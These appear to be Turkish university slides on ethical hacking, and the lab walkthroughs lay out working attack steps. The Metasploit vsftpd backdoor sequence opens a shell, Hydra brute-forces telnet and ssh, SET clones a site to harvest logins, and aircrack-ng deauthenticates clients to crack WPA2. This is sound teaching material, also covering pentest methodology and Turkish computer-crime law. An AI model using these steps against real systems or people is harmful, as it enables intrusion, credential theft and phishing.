�ݺ�ߣ

SİBER SALDIRI YÖNTEMLERİ,
BİLGİ TOPLAMA ARAÇLARI
9.Hafta

Saldırı Aşamaları
• Bilgi Toplama(Veri)
• Hazırlık(Açıklık Tespiti)
• Saldırı(Açıklık Sömürme)
• Erişim
• Yetki Yükseltme
• İzleri Silmek

Saldırı MetodolojisiBilgiToplama
Aktif
Pasif
Tarama Zafiyet Doğrulama Sisteme Sızma
Yetki Yükseltme
Kendini Gizleme
Arka Kapı Bırakma

Saldırı Yöntem ve Çeşitleri
• Sistem tespiti (Fingerprinting)
• Zafiyetlerin Tespit Edilmesi
• Sistem ve Uygulamaya Yönelik Saldırıları
• Ağ Güvenliğine Yönelik Saldırılar
• Sosyal Mühendislik Saldırıları

Bilgi Toplama Yöntemleri
• Pasif
– Sistemle doğrudan iletişime geçmeden yapılan
bilgi toplama işlemleridir.
• Aktif
– Sistemle doğrudan iletişime geçerek yapılan bilgi
toplama işlemleridir.

Pasif Bilgi Toplama Araçları
• Whois/DNS(whois, Ripe, vb.)
• Arama motorları (Google, Bing, vb.)
• Dnsstuff (dnsstuff.com)
• Netcraft (netcraft.com)
• Arşiv siteleri (archive.org)
• IP Location (iplocation.net)
• Shodan (shodan.io)
• Bilgi toplama araçları

Aktif Bilgi Toplama Araçları
• Ping
• Nslookup
• Traceroute
• dig
• dnsmap
• Dmitry
• Fierce
• The Harvester
• Maltego
• Foca
• hping
• Nmap
• Centralops.net
• Pentest-tools.com
• Exploit-db.com
(Google Hacking Database)
• Robtex.com
• Mxtoolbox.com
• Dnsstuff.com

whois
• Kali -> Terminal -> #whois cu.edu.tr

Siber Guvenlik ve Etik Hhacking -2-

TARAMA, ZAFİYET TESPİTİ VE
PAROLA KIRMA
10. Hafta

Tarama
• Nmap
– Host, versiyon, tcp, ping, protocol, vb..
• Hping3
– Port, flag(paket), udp, vb..
• Zmap
• Netcat
• Nbtscan

nmap
• Nmap (Network Mapper)
– sT (3lü el sıkışma)
– sS (Syn taraması)
– sA (Ack firewall varmı)
– P 80 (ping olmadan 80.port)
– sU (Udp portlar)
– V (versiyonlar)
– O (işletim sistemi tahmini)
• nmap -sS -sV --open -n 192.168.1.1

Zafiyet Tespiti
• Network
– Nessus, OpenVas, INFRA
• Web
– Nikto, Acunetix, Burp Suite, Owasp Zap
• Metasploit
• Metasploitable 2

Parola Kırma
• Hydra
• Medusa
• Mimikatz
• Ncrack
hydra -L userlist -P passlist 192.168.0.1 protokol

Uygulama 1
• Nmap
• vsftpd
• Metasploit
• Exploit

Metasploitable
Sanal makine olarak ç��ış��ı��ı��ǰ��ܳ�..

Metasploitable
Kullanıcı adı ve parola, msfadmin

Metasploitable
ifconfig komutu ile IP bilgisini öğreniyoruz..

Erişim Kontrolü
Kali sanal makinamızdan Metasploitable2 sanal
makinamıza ping ile erişim sağladığımızı kontrol
ediyoruz. (Metasploitable’ın IP’sini öğrenmiştik)

Nmap ile Tarama
Nmap aracı ile sanal makinamızın taramasını
başlatıyoruz.
(Taradığımız makine, metasploitable sanal makinesi)

Nmap Tarama Sonuçları
Tarama sonucu zaafiyetler barından sistemde açık olan
servisler, portları ve sürüm bilgilerine erişiyoruz.

Nmap Sonucu Değerlendirme
İlk sırada bulunan ftp servisinin vsftpd sürümüne ilişkin
bir zafiyet sömürme aracı varmı kontrol ediyoruz.

Metasploit
Metasploit aracını açıyoruz..
msfconsole veya M simgesi ile..

Metasploit
Metasploit içerisinde vsftpd ile ilgili arama yapıyoruz..
search vsftpd
Bir adet backdoor buluyoruz.

Metasploit
Bulduğumuz exploit’i kullanmaya ve seçeneklerini
görmeye başlıyoruz.
use exploit/unix/ftp/vsftpd_234_backdoor
show options

Metasploit
Ardından RHOST ile IP tanımlıyoruz, payload
seçeneklerine bakıyoruz.
set RHOST 192.168.72.131
show payloads

Metasploit
Payload’ı kullanmak için tanımlıyoruz ve seçeneklerine
bakıyoruz.
set payload cmd/unix/interact
show payloads

Metasploit
RPORT ile port tanımlamasını yapıyoruz.
set RPORT 21

Metasploit
Tanımladığımız bilgiler doğrultusunda payload’ın
çalıştırılması için başlatıyoruz.
exploit
veya
Run

Metasploit
Exploit çalıştı başarılı bir şekilde payload makinanın
shell oturumunu açtı.. Artık sistemdeyiz…

Uygulama 2
• Nmap
• ssh
• hydra

Metasploitable
Hedef sistem olarak belirlenen sanal
makinamızın IP bilgisini öğrendikten sonra Nmap
taraması ile erişmek istediğimiz servisleri
belirliyoruz. (telnet ve ssh)

Hydra ile Parola Kırma Atağı
Servislerin kullanıcı adı ve parolasını tekil olarak tahmin
ile denemek için Hydra’yı kullanıyoruz. (telnet ve ssh)

Hydra
Kullanıcı adı ve parola listeleri oluşturup onları Hydra ile
deniyoruz.

Hydra
Liste denemelerimizin sonuçları.. (telnet ve ssh)

Uygulama 3
• Man in the Middle
• Sosyal mühendislik

Sosyal Mühendislik
Site clone yöntemi ile kişileri orijinal sitelerin
benzer zararlı kopyalarına ulaştırıp kullanıcı adı
ve parola bilgilerini alma amaçlı bir sosyal
mühendislik saldırı örneği oluşturmak için;
Se-Toolkit kullanıyoruz.

Sosyal Mühendislik
SET açılıyor..

Sosyal Mühendislik
Sosyal Mühendislik Atağı’nı ��ç��ǰ��ܳ�..

Sosyal Mühendislik
Web site atağını ��ç��ǰ��ܳ�..

Sosyal Mühendislik
Kimlik Doğrulayıcı(Credential Harvester) atağını ��ç��ǰ��ܳ�..

Sosyal Mühendislik
Site klonlamayı ��ç��ǰ��ܳ�..

Sosyal Mühendislik
Klon site için IP adresi belirleyip, Gerçek sitenin url
bilgisini yazıyoruz.(klonu yapılacak site)

Sosyal Mühendislik
Klonumuz hazır.. Artık tarayıcı ile IP adresine gelen
kullanıcının bilgilerini alabiliriz..

Sosyal Mühendislik
Tarayıcı açıp IP adresini giriyoruz..

Sosyal Mühendislik
Klonumuz karşımızda..

Sosyal Mühendislik
Kullanıcı bilgilerini girdiğinde ve giriş yaptığında sanki
yanlış yazılmış gibi orijinal siteye gönderiyor..

Sosyal Mühendislik
Orijinal site..

Sosyal Mühendislik
Kullanıcının girdiği bilgiler artık elimizde…
Kullanıcı adı ve parola..

WEB GÜVENLİĞİ SALDIRI VE SAVUNMA
YÖNTEM-ARAÇLARI (TEMİZ KOD)
11. Hafta

Web
• TCP/IP
– Http protokolü
• Web Server

HTTP Metodları
Yöntem Açıklama
GET Sunucudan bir kaynağı ister
HEAD GET gibi kullanılır ama sadece Header getirir ve içerik getirmez
POST Sunucuda bulunan verinin içeriğini değiştirmesini ister
PUT Sunucuda bir kaynak yaratmasını veya başka kaynak ile değiştirmesini ister
DELETE Sunucuda bulunan bir kaynağı silmesini ister
CONNECT SSL bağlantıların HTTP bağlantıları içinden geçmesini sağlar
OPTIONS Sunucudan bir kaynakla ilgili geçerli yöntemleri ister
TRACE Sunucunun istek Header’larını geri göndermesini ister

HTTP Durum Kodları
• 1xx: Bilgi mesajları.
• 2xx: Başarılı istek yanıtları.
• 3xx: İstemciyi başka bir kaynağa yönlendiren
yanıtlar.
• 4xx: Bir hata barındıran isteklere karşı üretilen
yanıtlar.
• 5xx: Sunucu tarafında istek karşılanmaya
çalışılırken bir hata alındığına ilişkin yanıtlar.
404Page not found

Http Header Bilgileri
• Request
– Cf-Connecting-Ip
– Cookie
– Accept-Language
– Referer
– Accept
– User-Agent
– Upgrade-Insecure-Requests
– Cf-Visitor
– X-Forwarded-Proto
– Cf-Ray
– X-Forwarded-For
– Cf-Ipcountry
– Accept-Encoding
– Connection
– Host
• Response
– Content-Base
– Content-Length
– Cache-Control
– Content-Type
– Date
– eTag
– Last-Modified
– Location
– Server
– Set-Cookie
– X-Powered-By
– WWW-Authenticate
– Connection
Bir web sitesinin header bilgilerini görmek için; https://headers.cloxy.net/ adresinden
yararlanılabilir.

Sunucu Teknolojileri
• Scripting dilleri (PHP, VBScript, Perl)
• Web uygulama platformları (ASP.NET, Java)
• Web sunucuları (Apache, IIS, ngix)
• Veritabanları (MS-SQL, Oracle, MySQL)
• ve diğer destekleyici servislerdir (File Systems, SOAP
tabanlı web servisleri, dizin servisleri)
• İstemci gönderileri
– URL sorgu string’leri
– HTTP cookie’leri
– POST metodu ile yapılan istek mesaj gövdeleri

Web Lab Uygulama Yazılımları
• DVWA
• Mutillidae
• SQLol
• Hackxor
• The BodgeIt Store
• Exploit KB / exploit.co.il Vulnerable Web App
• WackoPicko
• WebGoat
• OWASP Hackademic Challenges Project
• XSSeducation

Damn Vulnerable Web App (DVWA)
• Web uygulama güvenliği alanında kendini geliştirmek
isteyenler için PHP ile oluşturulmuş içinde belli web
zafiyetlerini barındıran bir eğitim sistemidir.
• Barındırdığı Zafiyetler:
– Brute Force
– Command Execution
– CSRF
– File Inclusion
– SQL Injection
– Upload
– XSS Reflected
– XSS Stored

DVWS Uygulamaları
• Sanal makine Metasploitable2
• Firefox tarayıcısı

KABLOSUZ AĞ GÜVENLİĞİ
12. Hafta

Kablosuz Ağ Güvenliği
• Open Security
• WEP
• WPA
• RSN
• RADIUS / WPA-RADIUS
• Wireless Gateway
• Firmalara özel çözümler

Kablosuz Ağ Saldırı Çeşitleri
(IEEE 802.11x Tehditleri)
• Erişim Kontrolü Saldırıları (Access Control Attacks)
• Gizlilik Saldırıları (Confidentiality Attacks)
• Bütünlük Doğrulama Saldırıları(Integrity Attacks)
• Kimlik Doğrulama Saldırıları (Authentication Attacks)
• Kullanılabilirlik saldırıları (Availability Attacks)

Erişim Kontrolü Saldırıları
(Access Control Attacks)
• Kablosuz Ağları Tarama (War Driving)
• Yetkisiz Erişim Noktası (Rogue Access Point)
• Mac Adres Sahteciliği (Mac Spoofing)
• Ip Adresi Yanıltma (Ip Spoofing)
• Güvenli Olmayan Ağa Bağlanma (Adhoc Associations)
• 802.1x Radius Cracking

Gizlilik Saldırıları
(Confidentiality Attacks)
• Gizli Dinleme (Eavesdropping)
• Wep Anahtarı Kırma (Wep Key Cracking)
• Ap Üzerinde Sahte Portal Çalıştırmak (Ap Phishing)
• Ortadaki Adam Saldırısı (Man In The Middle)

Bütünlük Doğrulama Saldırıları
(Integrity Attacks)
• 802.11 Paketi Püskürtme (Frame Injection)
• 802.11 Veri Tekrarlama (802.11 Data Replay)
• 802.1x EAP Tekrarlama (802.1x EAP Replay)
• 802.1x Radius Tekrarlama (802.1x Radius Replay)

Kimlik Doğrulama Saldırıları
(Authentication Attacks)
• Shared Key Guessing
• PSK Cracking
• 802.1x Password Guessing
• Application Login Theft
• Domain Login Cracking
• 802.1x LEAP Cracking
• 802.1x EAP Downgrade

Kullanılabilirlik Saldırıları
(Availability Attacks)
• Servis Reddi Saldırıları (DoS Attacks)
• AP Theft
• Queensland DoS
• 802.11 Beacon Flood
• 802.11 Deauthenticate Flood
• …

Saldırı Araçları
• airmon-ng
• airodump-ng
• aireplay-ng
• aircrack-ng
• reaver
• Netstumbler /
MiniStumbler
• Kismet
• Airodump
• Aircrack

Saldırı Yöntemi
• airmon-ng start wlan0 wifi monitor mod
• airodump-ng wlan0mon çevredeki ağlar bilgi
• airodump-ng wlan0mon BSSID ile paket toplar
• aireplay-ng –deauth 100 -e Test wlan0mon
istemciyi yeniden bağlanmaya zorlama (el sıkışma)
• aircrack-ng WPA2-01.cap -w /wordlist/liste.txt – o
paketlere kaba kuvvet saldırısı ile parola bulma.

Savunma
• Kablosuz ağ erişim noktalarının yama ve
firmware güncellemesinin yapılması
• WPA/WPA2 ile güçlü parola ilkesi uygulanmalı
• Mümkünse trafik VPN ile tünelleyerek
şifrelenmeli
• Mümkünse Mac filter kullanılmalı

SIZMA TESTLERİ(PENTEST)VE
SİBER GÜVENLİK STANDARTLARI
13. Hafta

Sızma Testi
• Penetration Test
• PenTest
• Sızma Testi
• Yazılım Güvenlik Testi
• Siber Güvenlik Tatbikatı
• Siber Tatbikat
gibi isimlerle de anılmaktadır.

Sızma Testi
Güvenlik uzmanları tarafından gerçekleştirilen,
kötü amaçlı bir saldırganın sisteme verebileceği
zararları raporlamak ve önceden savunma
önlemleri almak amacı ile oluşturulan saldırı
denemelerinin tamamıdır. (Burlu, 2010)
Sızma testlerinin amacı, kuruluşlara sistemlerini
daha güvenli hale getirmelerinde yardımcı
olmaktır.

Sızma Testleri
• Beyaz şapkalı hacker,
• Etik hacker,
• Pentester,
• Sızma Testi Uzmanı,
gibi isimler adı altında ifade edilen siber güvenlik
uzmanları tarafından gerçekleştirilmektedir.
Uzmanlar belirli kalite standartlarına göre
çalışmaktadırlar.

Sızma Testi = Zafiyet Analizi mi?
• Sızma Testi ≠Zafiyet Analizi
• Aynı şey değildir.
• Sızma testi, yazılım ve yöntemler kullanarak
hedef sistemlere sızma girişimleridir.
• Zafiyet Analizi, otomatize araçlar kullanarak
sistem güvenliğinin teknik açıdan incelenmesi
ve raporlanmasıdır.

Zafiyetten > Sızma Testine
• Belirlenen bilişim sistemlerindeki mantık hataları
ve zafiyetleri tespit ederek, söz konusu güvenlik
açıklıklarının kötü niyetli kişiler tarafından
istismar edilmesini önlemek ve sistemleri daha
güvenli hale getirmek maksadıyla, “yetkili” kişiler
tarafından ve “yasal” olarak gerçekleştirilen
güvenlik testleridir.
• Pentest çalışmalarındaki asıl amaç, zafiyeti tespit
etmekten öte ilgili zafiyeti sisteme zarar
vermeyecek şekilde istismar etmek ve yetkili
erişimler elde etmektir.

Sızma Testi Yöntemleri
• Hedefe yapılacak testin türü uzmana verilecek
yetki ve bilgiye göre değişiklik göstermektedir.
• Beyaz Kutu Sızma Testleri (White Box)
• Siyah Kutu Sızma Testleri (Black Box)
• Gri Kutu Sızma Testleri (Gray Box)
Şeklinde üç gruba
ayırmak mümkündür.

Beyaz Kutu
• Güvenlik testi ekibi, sistemin kendisi ve arka
planda çalışan ilave teknolojiler hakkında tam
bilgi sahibidir.
• Test yapılan Firmaya daha büyük fayda sağlar.
• Hata ve zafiyetleri bulmak kolaylaşacağından
bunlara tedbir alınma süresi de azalacaktır.
• Sistemin zarar görme riski çok azdır ve maliyet
olarak da en az maliyetli olandır.

Siyah Kutu
• Başlangıçta güvenlik testi yapılacak sistemle ilgili
bir bilgi yoktur.
• Tamamen bilinmeyen bir sistem ile ilgili bilgi
toplanacak ve testler yapılacaktır.
• Bu yöntemde test ekibinin sistem ile ilgili bilgi
düzeyi hiç olmadığından, yanlışlıkla sisteme zarar
verme ihtimalleri de yüksektir.
• Bilgi toplama safhası oldukça zaman alır.
• Süre bakımından en uzun süren yaklaşım tarzıdır.

Gri Kutu
• Sistem ile ilgili bilgiler mevcuttur.
• Örneğin; IP adres listesi, sunucu sistem ile ilgili versiyon
bilgisi vb.
• Bilgiler güvenlik testi yapacak ekibe önceden
sağlanır.
• Black Box yaklaşımına göre daha kısa zaman alır.
• Kontrolü ve testi istenen IP adresleri belli
olduğundan sistemin, istem dışı zarar görme
ihtimali de azalmış olur.

Metodoloji
• Önceden belirlenmiş ve denenmiş, kalıplaşmış
standartlar haline gelmiş kural ve yöntemler.
• OWASP (Open Web Application Project)
• OSSTIMM (The Open Source Secırity Testing Methodology Manual)
• ISSAF (Information Systems Security Assessment Framework)
• NIST (SP800-15)

Sızma Testi Metodolojisi
• Bilgi toplama
• Ağ Haritalama
• Zayıflık Tarama
• Sisteme Sızma
• Yetki Yükseltme
• Başka Ağlara Sızma
• Erişimleri Koruma
• İzleri Temizleme
• Raporlama
Resim Kaynağı : CRYPTTECH
Kapsam Belirleme, Bilgi Toplama, Keşif ve Tarama, Zafiyet Taraması ve Analizi, İstismar Etme, Yetki Yükseltme, Yayılma, Bilgi-Doküman Toplama, İzleri Temizleme, Raporlama

Sızma Testi Çeşitleri
• İç Ağ
• Dış Ağ
• Web
• Kablosuz
• Mobil
• Sosyal Mühendislik
• Dos/DDoS
Resim Kaynağı: CRYPTTECH

Pentest Rapor Örnekleri
1. https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
2. https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-
33343
3. http://www.niiconsulting.com/services/security-assessment/NII_Sample_PT_Report.pdf

Standartları Oluşturan Kuruluşlar
• IEEE
• ICANN
• ISO/IEC
• ETSI
• IETF
• NIST
• PCI SSC
• TSE

Standartlar
• ISO 27001:2013 Bilgi Güvenliği Yönetim Sistemi
• CC
• COBIT
• COSO
• ITIL
• CMMI
• TSE

ISO 27001
• Varlıkların sınıﬂandırılması,
• Gizlilik, bütünlük ve erişebilirlik kriterlerine göre varlıkların
değerlendirilmesi,
• Risk analizi yapılması,
• Risk analizi çıktılarına göre uygulanacak kontrollerin belirlenmesi,
• Dokümantasyon oluşturulması,
• Kontrollerin uygulanması,
• İç tetkik,
• Kayıtların tutulması,
• Yönetimin gözden geçirmesi,
• Belgelendirme
şeklindedir.

Sertifikalar
• CompTIA – Security+
• CEH (Certified Ethical Hacker)
• LPT (Licensed Penetration Tester)
• OSCP (Offensive Security Certified Professional)
• CCSP (Cisco Certified Security)
• CISSP (Certified Information Systems Security Professional)
• CPTE (Certified Penetration Testing Engineer)
• ECSA (EC-Council Certified Security Analyst)
• GIAC (GPEN, GWAPT, GXPN)
• CEPT (Certified Expert Penetration Tester)

Windows Pentest Box
• Windows ile Pentest
araçları
• https://pentestbox.org

SİBER GÜVENLİĞİN HUKUKİ
BOYUTU VE BİLİŞİM HUKUKU
14. Hafta

Bilişim Hukuku
• Sayısal bilginin paylaşımını konu alan hukuk
dalıdır.
• İnternetin kullanımına ilişkin yasal çerçeveyi
belirleyen internet hukukunu kapsamaktadır.
• Yoğun olarak Ceza hukuku, Genel hukuk ve
Fikir Sanat Eserler Kanunun Hukuk kuralları
açısından ele alınır.
• https://www.tbb.org.tr/Content/Upload/Dokuman/801/BILISIM_HUKUKU.pdf

Bilişim Suçları
• Yetkisiz ve izinsiz erişim (Hacking)
• Verilere Yönelik Suçlar
• Bilişim Ağlarına Yönelik Suçlar
• Sanal Tecavüz
• Bilişim Ortamında Cinayet
• Tehdit ve Şantaj
• Hakaret ve sövme
• Taciz ve Sabotaj
• Dolandırıcılık
• Hırsızlık
• Sahtekarlık
• Manipülasyon
• Pornografi
• Röntgencilik
• Siber Terörizm
• Siber Propaganda

Bilişim İle İlgili Kanunlar
• Türk Ceza Kanunu (Bilişim Suçları) (5237)
• Türk Ceza Kanunu (Bilişim Vasıtalı Suçlar)
• Fikir ve Sanat Eserleri Kanunu (FSEK-5846) (71,72,73)
• Ceza Muhakemesi Kanunu (5271-Madde 134)
• Kaçakçılıkla Mücadele Kanunu (4926 - Madde 12)
• 5651 Sayılı Kanun (İnternet Ortamında Yapılan Yayınların
Düzenlenmesi ve Bu Yayınlar Yoluyla İşlenen Suçlarla Mücadele Edilmesi
Hakkında Kanun)
• 5809 Sayılı Elektronik Haberleşme Kanunu
• 5070 Sayılı Elektronik İmza Kanunu

5237 sayılı Türk Ceza Kanunu’nun
Bilişim Suçlarına İlişkin Hükümleri
• Madde 243
• Madde 244
• Madde 245
• Madde 124
• Madde 132
• Madde 133
• Madde 134
• Madde 135
• Madde 136
• Madde 137
• Madde 138
• Madde 140
• Madde 142
• Madde 158

Bilişim Suçlarına İlişkin Hükümleri
• Madde 243: Bilişim Sistemine Girme
• Madde 244: Sistemi Engelleme, Bozma, Verileri
Yok Etme veya Değiştirme
• Madde 245: (5377 Sayılı Kanunun 27. Maddesiyle Değişik):
Sahte Banka Veya Kredi Kartı Üretimi ve Kullanımı
• Madde 246: Tüzel kişiler hakkındaki tedbirler

Bilişim Vasıtalı Suçlarına İlişkin Hükümleri
• Madde 124: Haberleşmenin Engellenmesi
• Madde 132: Haberleşmenin Gizliliğini İhlal
• Madde 133: Kişiler Arasındaki Konuşmaların Dinlenmesi ve Kayda Alınması
• Madde 134: Özel Hayatın Gizliliğini İhlal
• Madde 135: Kişisel Verilerin Kaydedilmesi
• Madde 136: Verileri Hukuka Aykırı Olarak Verme veya Ele Geçirme
• Madde 137: Nitelikli Haller
• Madde 138: Verileri Yok Etmeme
• Madde 140: Tüzel Kişiler Hakkında Güvenlik Tedbiri Uygulanması
• Madde 142: Nitelikli Hırsızlık
• Madde 158: Nitelikli Dolandırıcılık
• Madde 226: Müstehcenlik

Fikir ve Sanat Eserleri Kanunu (5846)
• Madde 71 – Manevi Haklara Tecavüz.
– Yazılımı kamuya sunma hakkı,Yazılım sahibinin
adını belitme hakkı, Değişiklik yapılmaması hakkı
• Madde 72 – Mali Haklara Tecavüz.
– Değiştirmek, kopyalamak, çoğaltmak yaymak,
ticaret konusu yapmak, aracılık etmek, suçtur.
• Madde 73 – Diğer Suçlar

Ceza Muhakemesi Kanunu (5271)
• Madde 134 – Bilgisayarlarda, bilgisayar programlarında ve kütüklerinde arama,
kopyalama ve elkoyma.
– (1) Bir suç dolayısıyla yapılan soruşturmada, başka surette delil elde etme imkânının
bulunmaması halinde, Cumhuriyet savcısının istemi üzerine şüphelinin kullandığı
bilgisayar ve bilgisayar programları ile bilgisayar kütüklerinde arama yapılmasına,
bilgisayar kayıtlarından kopya çıkarılmasına, bu kayıtların çözülerek metin hâline
getirilmesine hâkim tarafından karar verilir.
– (2) Bilgisayar, bilgisayar programları ve bilgisayar kütüklerine şifrenin çözülememesinden
dolayı girilememesi veya gizlenmiş bilgilere ulaşılamaması halinde çözümün
yapılabilmesi ve gerekli kopyaların alınabilmesi için, bu araç ve gereçlere elkonulabilir.
Şifrenin çözümünün yapılması ve gerekli kopyaların alınması halinde, elkonulan cihazlar
gecikme olmaksızın iade edilir.
– (3) Bilgisayar veya bilgisayar kütüklerine elkoyma işlemi sırasında, sistemdeki bütün
verilerin yedeklemesi yapılır.
– (4) İstemesi halinde, bu yedekten bir kopya çıkarılarak şüpheliye veya vekiline verilir ve
bu husus tutanağa geçirilerek imza altına alınır. (5) Bilgisayar veya bilgisayar kütüklerine
elkoymaksızın da, sistemdeki verilerin tamamının veya bir kısmının kopyası alınabilir.
Kopyası alınan veriler kâğıda yazdırılarak, bu husus tutanağa kaydedilir ve ilgililer
tarafından imza altına alınır

Kaçakçılıkla Mücadele Kanunu (4926)
• Madde 12 – Gümrük idarelerinde sahte beyan
ve belge.
– Gümrük idarelerinde işlem görmediği halde işlem
görmüş gibi herhangi bir belge veya beyanname
düzenleyenler veya bu suçları bilişim yoluyla
işleyenler hakkında Türk Ceza Kanununun evrakta
sahtekarlık ve bilişim alanındaki suçlarla ilgili
hükümlerinde belirtilen cezalar bir kat artırılarak
uygulanır.

Türk Ceza Kanunu (243)
Türk Ceza Kanunu Madde 243 (Bilişim sistemine girme)
(1) Bir bilişim sisteminin bütününe veya bir kısmına,
hukuka aykırı olarak giren ve orada kalmaya devam
eden kimseye bir yıla kadar hapis veya adlî para cezası
verilir.
(2) Yukarıdaki fıkrada tanımlanan fiillerin bedeli karşılığı
yararlanılabilen sistemler hakkında işlenmesi hâlinde,
verilecek ceza yarı oranına kadar indirilir.
(3) Bu fiil nedeniyle sistemin içerdiği veriler yok olur veya
değişirse, altı aydan iki yıla kadar hapis cezasına
hükmolunur.

Türk Ceza Kanunu (244)
Türk Ceza Kanunu Madde 244 (Sistemi engelleme, bozma, verileri yok etme veya değiştirme)
(1) Bir bilişim sisteminin işleyişini engelleyen veya bozan kişi, bir yıldan beş
yıla kadar hapis cezası ile cezalandırılır.
(2) Bir bilişim sistemindeki verileri bozan, yok eden, değiştiren veya erişilmez
kılan, sisteme veri yerleştiren, var olan verileri başka bir yere gönderen
kişi, altı aydan üç yıla kadar hapis cezası ile cezalandırılır.
(3) Bu fiillerin bir banka veya kredi kurumuna ya da bir kamu kurum veya
kuruluşuna ait bilişim sistemi üzerinde işlenmesi halinde, verilecek ceza
yarı oranında artırılır.
(4) Yukarıdaki fıkralarda tanımlanan fiillerin işlenmesi suretiyle kişinin
kendisinin veya başkasının yararına haksız bir çıkar sağlamasının başka
bir suç oluşturmaması hâlinde, iki yıldan altı yıla kadar hapis ve beşbin
güne kadar adlî para cezasına hükmolunur.

GENEL TEKRAR
VE FİNALE HAZIRLIK
15. Hafta

�ݺ�ߣ

Siber Guvenlik ve Etik Hhacking -2-

Recommended

More Related Content

What's hot (20)

Similar to Siber Guvenlik ve Etik Hhacking -2- (20)

More from Murat KARA (16)

Siber Guvenlik ve Etik Hhacking -2-